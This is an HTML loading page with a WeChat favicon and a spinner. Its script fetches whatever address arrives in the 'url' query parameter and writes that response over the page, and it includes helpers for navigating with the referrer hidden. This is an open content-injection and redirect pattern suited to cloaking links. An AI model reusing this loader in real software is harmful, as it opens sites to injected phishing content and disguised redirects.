<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel="shortcut icon" type="image/x-icon" href="https://res.wx.qq.com/a/wx_fed/assets/res/NTI4MWU5.ico">
    <meta name="viewport"  content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0,user-scalable=no" />
    <title>加载中...</title>
    <style>
    	body{
    		background-color: #F4F4F4;
    	}
    	.mask {
			position: fixed;
			z-index: 1000;
			top: 0;
			right: 0;
			left: 0;
			bottom: 0;
		}
		.load {
			position: fixed;
			top: 40%;
			left: 50%;
			transform: translate(-50%, -50%);
			width: 80px;
			height: 60px;
			text-align: center;
		}
		.load > div {
			background-color: rgba(17, 17, 17, 0.7);
			height: 100%;
			width: 6px;
			display: inline-block;
			-webkit-animation: stretchdelay 1.2s infinite ease-in-out;
			animation: stretchdelay 1.2s infinite ease-in-out;
		}
		.load .rect2 {
			-webkit-animation-delay: -1.1s;
			animation-delay: -1.1s;
		}
		.load .rect3 {
			-webkit-animation-delay: -1s;
			animation-delay: -1s;
		}
		.load .rect4 {
			-webkit-animation-delay: -0.9s;
			animation-delay: -0.9s;
		}
		.load .rect5 {
			-webkit-animation-delay: -0.8s;
			animation-delay: -0.8s;
		}
		@-webkit-keyframes stretchdelay {
			0%,
			40%,
			100% {
				-webkit-transform: scaleY(0.4);
			}
			20% {
				-webkit-transform: scaleY(1);
			}
		}
		@keyframes stretchdelay {
			0%,
			40%,
			100% {
				transform: scaleY(0.4);
				-webkit-transform: scaleY(0.4);
			}
			20% {
				transform: scaleY(1);
				-webkit-transform: scaleY(1);
			}
		}
    </style>
  </head>
  <body>
	<div class="mask"></div>
	<div class="load">
		<div class="rect1"></div>
		<div class="rect2"></div>
		<div class="rect3"></div>
		<div class="rect4"></div>
		<div class="rect5"></div>
	</div>
    <script>
		function njp(url) {
			setTimeout(function() {
				var a = document.createElement('a');
				a.href = url;
				a.rel = 'noreferrer';
				a.click();
			}, 0);
		}
		function jp(url) {
			location.href = url;
		}
    function getParam(sVar) {
      return decodeURI(window.location.search.replace(new RegExp("^(?:.*[&\\?]" + encodeURI(sVar).replace(/[\.\+\*]/g, "\\$&") + "(?:\\=([^&]*))?)?.*$", "i"), "$1"));
    }
		function load(url) {
			var xhr = new XMLHttpRequest();
			xhr.ontimeout = function(){location.reload();};
			xhr.onreadystatechange = function() {
				if (xhr.readyState === 4 && xhr.status === 200) {
					var new_doc = document.open("text/html", "replace");
					new_doc.write(xhr.responseText);
					new_doc.close();
				}
			};
			xhr.open('GET', url, true);
			xhr.send();
		}
    load((getParam('url')));
    </script>
  </body>
</html>
